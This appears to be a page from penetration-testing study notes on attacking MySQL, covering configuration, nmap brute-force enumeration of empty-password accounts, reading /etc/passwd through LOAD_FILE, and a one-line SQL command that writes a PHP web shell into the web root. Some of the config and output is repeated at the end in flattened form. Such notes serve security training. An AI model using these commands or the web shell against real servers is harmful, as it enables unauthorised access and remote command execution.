MYSQL attacks

Default Configuration

sudo apt install mysql-server -y

cat /etc/mysql/mysql.conf.d/mysqld.cnf | grep -v "#" | sed -r '/^\s*$/d'

[client]
port		= 3306
socket		= /var/run/mysqld/mysqld.sock

[mysqld_safe]
pid-file	= /var/run/mysqld/mysqld.pid
socket		= /var/run/mysqld/mysqld.sock
nice		= 0

[mysqld]
skip-host-cache
skip-name-resolve
user		= mysql
pid-file	= /var/run/mysqld/mysqld.pid
socket		= /var/run/mysqld/mysqld.sock
port		= 3306
basedir		= /usr
datadir		= /var/lib/mysql
tmpdir		= /tmp
lc-messages-dir	= /usr/share/mysql
explicit_defaults_for_timestamp

symbolic-links=0

!includedir /etc/mysql/conf.d/

Dangerous Settings

Settings

Description

user

Sets which user the MySQL service will run as.

password

Sets the password for the MySQL user.

admin_address

The IP address on which to listen for TCP/IP connections on the administrative network interface.

debug

This variable indicates the current debugging settings

sql_warnings

This variable controls whether single-row INSERT statements produce an information string if warnings occur.

secure_file_priv

This variable is used to limit the effect of data import and export operations.

Footprinting the Service

 sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-21 00:53 CEST
Nmap scan report for 10.129.14.128
Host is up (0.00021s latency).

PORT     STATE SERVICE     VERSION
3306/tcp open  nagios-nsca Nagios NSCA
| mysql-brute: 
|   Accounts: 
|     root:<empty> - Valid credentials
|_  Statistics: Performed 45010 guesses in 5 seconds, average tps: 9002.0
|_mysql-databases: ERROR: Script execution failed (use -d to debug)
|_mysql-dump-hashes: ERROR: Script execution failed (use -d to debug)
| mysql-empty-password: 
|_  root account has empty password
| mysql-enum: 
|   Valid usernames: 
|     root:<empty> - Valid credentials
|     netadmin:<empty> - Valid credentials
|     guest:<empty> - Valid credentials
|     user:<empty> - Valid credentials
|     web:<empty> - Valid credentials
|     sysadmin:<empty> - Valid credentials
|     administrator:<empty> - Valid credentials
|     webadmin:<empty> - Valid credentials
|     admin:<empty> - Valid credentials
|     test:<empty> - Valid credentials
|_  Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
| mysql-info: 
|   Protocol: 10
|   Version: 8.0.26-0ubuntu0.20.04.1
|   Thread ID: 13
|   Capabilities flags: 65535
|   Some Capabilities: SupportsLoadDataLocal, SupportsTransactions, Speaks41ProtocolOld, LongPassword, DontAllowDatabaseTableColumn, Support41Auth, IgnoreSigpipes, SwitchToSSLAfterHandshake, FoundRows, InteractiveClient, Speaks41ProtocolNew, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, LongColumnFlag, SupportsCompression, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: YTSgMfqvx\x0F\x7F\x16\&\x1EAeK>0
|_  Auth Plugin Name: caching_sha2_password
|_mysql-users: ERROR: Script execution failed (use -d to debug)
|_mysql-variables: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:00:00:00:00:00 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.21 seconds

MySQL - Read Local Files in MySQL

 select LOAD_FILE("/etc/passwd");

+--------------------------+
| LOAD_FILE("/etc/passwd")
+--------------------------------------------------+
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
<SNIP>

https://www.w3resource.com/mysql/string-functions/mysql-load_file-function.php

Write Local Files

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

secure_file_priv may be set as follows
- If empty, the variable has no effect, which is not a secure setting.
- If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.
- If set to NULL, the server disables import and export operations.
In the following example, we can see the secure_file_priv variable is empty, which means we can read and write data using MySQL:

MySQL - Secure File Privileges

 show variables like "secure_file_priv";

User Defined Functions

- It is not common to encounter a user-defined function like this in a production environment, but we should be aware that we may be able to use it.

PreviousSNMP Attack NextIPMI

Last updated 9 months ago

[client] port = 3306 socket = /var/run/mysqld/mysqld.sock [mysqld_safe] pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock nice = 0 [mysqld] skip-host-cache skip-name-resolve user = mysql pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock port = 3306 basedir = /usr datadir = /var/lib/mysql tmpdir = /tmp lc-messages-dir = /usr/share/mysql explicit_defaults_for_timestamp symbolic-links=0 !includedir /etc/mysql/conf.d/

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-21 00:53 CEST Nmap scan report for 10.129.14.128 Host is up (0.00021s latency). PORT STATE SERVICE VERSION 3306/tcp open nagios-nsca Nagios NSCA | mysql-brute: | Accounts: | root:<empty> - Valid credentials |_ Statistics: Performed 45010 guesses in 5 seconds, average tps: 9002.0 |_mysql-databases: ERROR: Script execution failed (use -d to debug) |_mysql-dump-hashes: ERROR: Script execution failed (use -d to debug) | mysql-empty-password: |_ root account has empty password | mysql-enum: | Valid usernames: | root:<empty> - Valid credentials | netadmin:<empty> - Valid credentials | guest:<empty> - Valid credentials | user:<empty> - Valid credentials | web:<empty> - Valid credentials | sysadmin:<empty> - Valid credentials | administrator:<empty> - Valid credentials | webadmin:<empty> - Valid credentials | admin:<empty> - Valid credentials | test:<empty> - Valid credentials |_ Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0 | mysql-info: | Protocol: 10 | Version: 8.0.26-0ubuntu0.20.04.1 | Thread ID: 13 | Capabilities flags: 65535 | Some Capabilities: SupportsLoadDataLocal, SupportsTransactions, Speaks41ProtocolOld, LongPassword, DontAllowDatabaseTableColumn, Support41Auth, IgnoreSigpipes, SwitchToSSLAfterHandshake, FoundRows, InteractiveClient, Speaks41ProtocolNew, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, LongColumnFlag, SupportsCompression, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults | Status: Autocommit | Salt: YTSgMfqvx\x0F\x7F\x16\&\x1EAeK>0 |_ Auth Plugin Name: caching_sha2_password |_mysql-users: ERROR: Script execution failed (use -d to debug) |_mysql-variables: ERROR: Script execution failed (use -d to debug) |_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug) MAC Address: 00:00:00:00:00:00 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.21 seconds

+--------------------------+ | LOAD_FILE("/etc/passwd") +--------------------------------------------------+ root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync <SNIP>